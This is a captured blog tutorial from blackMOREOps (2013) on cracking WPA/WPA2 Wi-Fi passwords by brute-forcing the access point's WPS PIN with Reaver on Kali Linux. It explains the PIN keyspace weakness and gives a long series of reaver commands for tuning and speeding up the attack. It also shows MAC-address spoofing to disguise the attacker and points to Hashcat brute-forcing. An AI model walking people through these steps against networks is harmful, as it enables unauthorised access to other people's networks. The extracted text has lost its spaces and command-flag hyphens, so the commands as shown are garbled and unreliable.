CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
Learnonetrickaday....
HomeCrackingCrackingWifiWPA/WPA2passwordsusingReaverWPS
CrackingWifiWPA/WPA2passwordsusing
ReaverWPS
ThisentrywaspostedinCrackingHackingLinuxReaverWifiWirelessandtaggedCrackingReaverWPSWifiWPA2onOctober
12,2013byblackMOREOps(updated13daysago)
1. Top5Wireless
3. WifiBooster
5. WirelessAccess
2. WirelessEarbuds
4. WirelessConnection
6. WirelessWiFi
reaverwps
BruteforceattackagainstWifiProtectedSetupCrackingWifiWPA/WPA2passwordsusingReaver
WPS
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
1/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
1. WirelessWiFi
2. Top5Wireless
3. WifiBooster
4. WirelessAccessPoints
5. WirelessEarbuds
Overview:
ReaverwpsperformsabruteforceattackagainstanaccesspointsWiFiProtectedSetuppinnumber.Oncethe
WPSpinisfound,theWPAPSKcanberecoveredandalternatelytheAPswirelesssettingscanbe
reconfigured.ThispostoutlinesthestepsandcommandthathelpscrackingWifiWPA/WPA2passwordsusing
ReaverWPS.
WhileReaverwpsdoesnotsupportreconfiguringtheAP,thiscanbeaccomplishedwithwpa_supplicantonce
theWPSpinisknown.
Readers,notethatIvesincewrittenanotherpostwhereIcouldcrackapasswordin14.21seconds.usingpyrit
cowpattyandWiFitecombinationattackwithdictionary.Thewholeprocesstakeslessthan10minutes.
ThosewhowouldliketotrymorewaysofcrackingWifiWPAWPA2passwords,youcanalsouseHashCator
cudaHashcatoroclHashcattocrackyourunknownWifiWPAWPA2passwords.ThebenefitofusingHashcatis,
youcancreateyourownruletomatchapatternanddoaBruteforceattack.Thisisanalternativetousing
dictionaryattackwheredictionarycancontainonlycertainamountofwordsbutabruteforceattackwillallow
youtotesteverypossiblecombinationsofgivencharsets.HashcatcancrackWifiWPA/WPA2passwordsand
youcanalsouseittocrackMD5,phpBB,MySQLandSHA1passwords.UsingHashcatisangoodoptionasif
youcanguess1or2charactersinapassword,itonlytakesfewminutes.Forexample:ifyouknow3
charactersinapassword,ittakes12minutestocrackit.Ifyouknow4charactersinapassword,ittakes3
minutes.Youcanmakerulestoonlytrylettersandnumberstocrackacompletelyunknownpasswordifyou
knowacertainRoutersdefaultpasswordcontainsonlythose.Possibilitiesofcrackingisalothigherinthisway.
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
2/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
ImportantNote:Manyuserstrytocapturewithnetworkcardsthatarenotsupported.Youshouldpurchasea
cardthatsupportsKaliLinuxincludinginjectionandmonitormodeetc.Alistcanbefoundin802.11
RecommendedUSBWirelessCardsforKaliLinux.Itisveryimportantthatyouhaveasupportedcard,
otherwiseyoullbejustwastingtimeandeffortonsomethingthatjustwontdothejob.
Contents[hide]
reaverwps
BruteforceattackagainstWifiProtectedSetupCrackingWifi
WPA/WPA2passwordsusingReaverWPS
Overview:
Description:
Installation:
Usage:
MoreonBasicUsages
SpeedingUptheAttack
MACSpoofing
SupportedWirelessDrivers
PartiallySupported
NotSupported
Conclusion
Related
Description:
ReaverwpstargetstheexternalregistrarfunctionalitymandatedbytheWiFiProtectedSetupspecification.
Accesspointswillprovideauthenticatedregistrarswiththeircurrentwirelessconfiguration(includingtheWPA
PSK),andalsoacceptanewconfigurationfromtheregistrar.
Inordertoauthenticateasaregistrar,theregistrarmustproveitsknowledgeoftheAPs8digitpinnumber.
RegistrarsmayauthenticatethemselvestoanAPatanytimewithoutanyuserinteraction.BecausetheWPS
protocolisconductedoverEAP,theregistrarneedonlybeassociatedwiththeAPanddoesnotneedanyprior
knowledgeofthewirelessencryptionorconfiguration.
ReaverwpsperformsabruteforceattackagainsttheAP,attemptingeverypossiblecombinationinorderto
guesstheAPs8digitpinnumber.Sincethepinnumbersareallnumeric,thereare10^8(100,000,000)
possiblevaluesforanygivenpinnumber.However,becausethelastdigitofthepinisachecksumvaluewhich
canbecalculatedbasedontheprevious7digits,thatkeyspaceisreducedto10^7(10,000,000)possible
values.
ThekeyspaceisreducedevenfurtherduetothefactthattheWPSauthenticationprotocolcutsthepininhalf
andvalidateseachhalfindividually.Thatmeansthatthereare10^4(10,000)possiblevaluesforthefirsthalfof
thepinand10^3(1,000)possiblevaluesforthesecondhalfofthepin,withthelastdigitofthepinbeinga
checksum.
Reaverwpsbruteforcesthefirsthalfofthepinandthenthesecondhalfofthepin,meaningthattheentirekey
spacefortheWPSpinnumbercanbeexhaustedin11,000attempts.ThespeedatwhichReavercantestpin
numbersisentirelylimitedbythespeedatwhichtheAPcanprocessWPSrequests.SomeAPsarefastenough
thatonepincanbetestedeverysecondothersareslowerandonlyallowonepineverytenseconds.
Statistically,itwillonlytakehalfofthattimeinordertoguessthecorrectpinnumber.
Installation:
InstallKaliLinux,everythingbuiltintoit.(Reaverwps,libpcapandlibsqlite3)
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
3/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
1. WirelessWiFi
2. Top5Wireless
3. WifiBooster
4. WirelessAccessPoints
5. WirelessEarbuds
Usage:
Usually,theonlyrequiredargumentstoReaverwpsaretheinterfacenameandtheBSSIDofthetargetAP:
#reaverimon0b00:01:02:03:04:05
ThechannelandSSID(providedthattheSSIDisnotcloaked)ofthetargetAPwillbeautomaticallyidentifiedby
Reaverwps,unlessexplicitlyspecifiedonthecommandline:
#reaverimon0b00:01:02:03:04:05c11elinksys
Bydefault,iftheAPswitcheschannels,Reaverwpswillalsochangeitschannelaccordingly.However,this
featuremaybedisabledbyfixingtheinterfaceschannel:
#reaverimon0b00:01:02:03:04:05fixed
Thedefaultreceivetimeoutperiodis5seconds.Thistimeoutperiodcanbesetmanuallyifnecessary(minimum
timeoutperiodis1second):
#reaverimon0b00:01:02:03:04:05t2
Thedefaultdelayperiodbetweenpinattemptsis1second.Thisvaluecanbeincreasedordecreasedtoany
nonnegativeintegervalue.Avalueofzeromeansnodelay:
#reaverimon0b00:01:02:03:04:05d0
SomeAPswilltemporarilylocktheirWPSstate,typicallyforfiveminutesorless,whensuspiciousactivityis
detected.Bydefaultwhenalockedstateisdetected,Reaverwpswillcheckthestateevery315seconds(5
minutesand15seconds)andnotcontinuebruteforcingpinsuntiltheWPSstateisunlocked.Thischeckcanbe
increasedordecreasedtoanynonnegativeintegervalue:
#reaverimon0b00:01:02:03:04:05lockdelay=250
Foradditionaloutput,theverboseoptionmaybeprovided.Providingtheverboseoptiontwicewillincrease
verbosityanddisplayeachpinnumberasitisattempted:
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
4/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
#reaverimon0b00:01:02:03:04:05vv
ThedefaulttimeoutperiodforreceivingtheM5andM7WPSresponsemessagesis.1seconds.Thistimeout
periodcanbesetmanuallyifnecessary(maxtimeoutperiodis1second):
#reaverimon0b00:01:02:03:04:05T.5
SomepoorWPSimplementationswilldropaconnectiononthefloorwhenaninvalidpinissuppliedinsteadof
respondingwithaNACKmessageasthespecsdictate.Toaccountforthis,ifanM5/M7timeoutisreached,itis
treatedthesameasaNACKbydefault.However,ifitisknownthatthetargetAPsendsNACKS(mostdo),this
featurecanbedisabledtoensurebetterreliability.ThisoptionislargelyuselessasReaverwpswillautodetect
ifanAPproperlyrespondswithNACKsornot:
#reaverimon0b00:01:02:03:04:05nack
WhilemostAPsdontcare,sendinganEAPFAILmessagetocloseoutaWPSsessionissometimesnecessary.
Bydefaultthisfeatureisdisabled,butcanbeenabledforthoseAPsthatneedit:
#reaverimon0b00:01:02:03:04:05eapterminate
When10consecutiveunexpectedWPSerrorsareencountered,awarningmessagewillbedisplayed.Sincethis
maybeasignthattheAPisratelimitingpinattemptsorsimplybeingoverloaded,asleepcanbeputinplace
thatwilloccurwheneverthesewarningmessagesappear:
#reaverimon0b00:01:02:03:04:05failwait=360
MoreonBasicUsages
First,makesureyourwirelesscardisinmonitormode:
#airmonngstartwlan0
TorunReaver,youmustspecifytheBSSIDofthetargetAPandthenameofthemonitormodeinterface
(usuallymon0,notwlan0,althoughthiswillvarybasedonyourwirelesscard/drivers):
#reaverimon0b00:01:02:03:04:05
YouwillprobablyalsowanttousevvtogetverboseinfoaboutReaversprogress:
#reaverimon0b00:01:02:03:04:05vv
SpeedingUptheAttack
Bydefault,Reaverwpshasa1seconddelaybetweenpinattempts.Youcandisablethisdelaybyaddingd0
onthecommandline,butsomeAPsmaynotlikeit:
#reaverimon0b00:01:02:03:04:05vvd0
Anotheroptionthatcanspeedupanattackisdhsmall.ThisoptioninstructsReavertousesmalldiffiehellman
secretnumbersinordertoreducethecomputationalloadonthetargetAP:
#reaverimon0b00:01:02:03:04:05vvdhsmall
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
5/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
MACSpoofing
Insomecasesyoumaywant/needtospoofyourMACaddress.ReaversupportsMACspoofingwiththemac
option,butyoumustensurethatyouhavespoofedyourMACcorrectlyinorderforittowork.
ChangingtheMACaddressofthevirtualmonitormodeinterface(typicallynamedmon0)WILLNOTWORK.
YoumustchangetheMACaddressofyourwirelesscardsphysicalinterface.Forexample:
#ifconfigwlan0down
#ifconfigwlan0hwether00:BA:AD:BE:EF:69
#ifconfigwlan0up
#airmonngstartwlan0
#reaverimon0b00:01:02:03:04:05vvmac=00:BA:AD:BE:EF:69
SupportedWirelessDrivers
ThefollowingwirelessdrivershavebeentestedorreportedtoworksuccessfullywithReaverwps:
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
PartiallySupported
Thefollowingwirelessdrivershavehadmixedsuccess,andmayormaynotworkdependingonyourwireless
card(i.e.,ifyouarehavingproblemswiththesedrivers/cards,considertryinganewcardbeforesubmittinga
troubleticket):
ath5k
iwlagn
rtl2800usb(usingthelatestcompatwirelessdrivershasfixedmanyuser'sproblems,hinthint.
..)
b43
NotSupported
Thefollowingwirelessdrivers/cardshavebeentestedorreportedtonotworkproperlywithReaver:
iwl4965
RT3070L
NetgearWG111v3
Conclusion
IfyouwanttoPentestorHackyourWifiPasswords,thenthefirstthingyouneedisacompatibleWificard.Most
Wificardsarepricedbetween15$35$USD.Iseenopointstrugglingwithanunsupportedcardwhenyoucan
justinvestthatextrabucksandthatcardwilllastyouyears.YougettolearnhowtopentestorhackWifi
passwords,howtoInject,spoof,setupfakeAPorHoneypot.SeethelistofsupportedUSBWifiadaptercards
thatworksinKaliLinuxandareavailableinAmazon.
Relatedpost:SpeedupWPA/WPA2crackingwithPyritandCUDAandleveragingWifite[Thispostisnow
replacedandupdatedbythenextonebelow]
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
6/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
CrackingWifiWPA/WPA2passwordsusingpyritcowpattyinKaliLinux
AboutblackMOREOps
blackMOREOpsisdedicatedtoHowto,Guides,SecurityfeaturesandTipsandTricksforLinuxOS.
Thankyouforvisitingusandfollowusherewww.blackmoreops.com.
ViewallpostsbyblackMOREOps
LeaveaReply
Email(required)
(Addressnevermadepublic)
Name(required)
Website
Notifymeofnewcommentsviaemail.
PostComment
Notifymeofnewpostsviaemail.
2thoughtsonCrackingWifiWPA/WPA2passwords
usingReaverWPS
Pingback:AdetailedguideoninstallingKaliLinuxonVirtualBoxblackMOREOps
Pingback:20thingstodoafterinstallingKaliLinuxblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
7/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
Postnavigation
FixingPulseAudioconfiguredforperusersessions(warning)inKaliLinuxandDebian
WPSCANandquickwordpresssecurity
GoogleSiteSearch
RecentPosts
darodar.comreferrerspamandWhattodo?
RandomquotesandcreaturesusingfortuneandcowsayinLinuxterminal
Fixingerror:Packagepackagenameisnotavailable,butisreferredtobyanotherpackage.Thismay
meanthatthepackageismissing,hasbeenobsoleted,orisonlyavailablefromanothersourceE:
Packagepackagenamehasnoinstallationcandidate
FixingProxyChainsERROR:ld.so:objectlibproxychains.so.3fromLD_PRELOADcannotbepreloaded:
ignored.
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
8/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
RecentComments
FixingProxyChainsERROR:ld.so:object'libproxychains.so.3'fromLD_PRELOADcannotbepreloaded:
ignored.blackMOREOpson20thingstodoafterinstallingKaliLinux
802.11RecommendedUSBWirelessCardsforKaliLinuxblackMOREOpsonTPLinkTLWDN3200
N600WirelessDualBandUSBAdapterinLinux
802.11RecommendedUSBWirelessCardsforKaliLinuxblackMOREOpsonCrackingWifi
WPA/WPA2passwordsusingpyritcowpattyinKaliLinux
Links18/12/2014:LinuxQuestions.orgPolls,FedoraforPOWER|TechrightsonRandomquotesand
creaturesusingfortuneandcowsayinLinuxterminal
Archives
December2014(6)
November2014(3)
October2014(4)
September2014(5)
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
9/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
August2014(9)
July2014(2)
June2014(10)
April2014(2)
March2014(8)
February2014(6)
January2014(12)
December2013(10)
November2013(12)
October2013(29)
Categories
BIOS(1)
Browser (5)
Cracking(3)
DataRecovery (1)
DDOS(1)
Denialofservice(1)
Driver (2)
Hacking(4)
Hashcat(1)
Howto(87)
Linux (115)
Administration(17)
AMD(9)
BIND(1)
CentOS(1)
DesktopManagers (12)
KaliLinux (62)
Metasploit(2)
Monitoring(3)
Networking(4)
NVIDIA(7)
ProxyChains (1)
Reaver (1)
Security (8)
Sound(2)
Pyrit(8)
cli(12)
VPN(1)
WPSCAN(2)
News (1)
Others (12)
Recoverrootpassword(1)
Spam(1)
Usability (2)
USB(1)
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
10/11
22/12/2014
CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
VirtualBox (2)
Wifi(9)
Wireless (3)
Wordpress (2)
RSSFeed
RSSPosts
RSSComments
2014blackMOREOpsDesignedbyThemes&Co
Backtotop
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/
11/11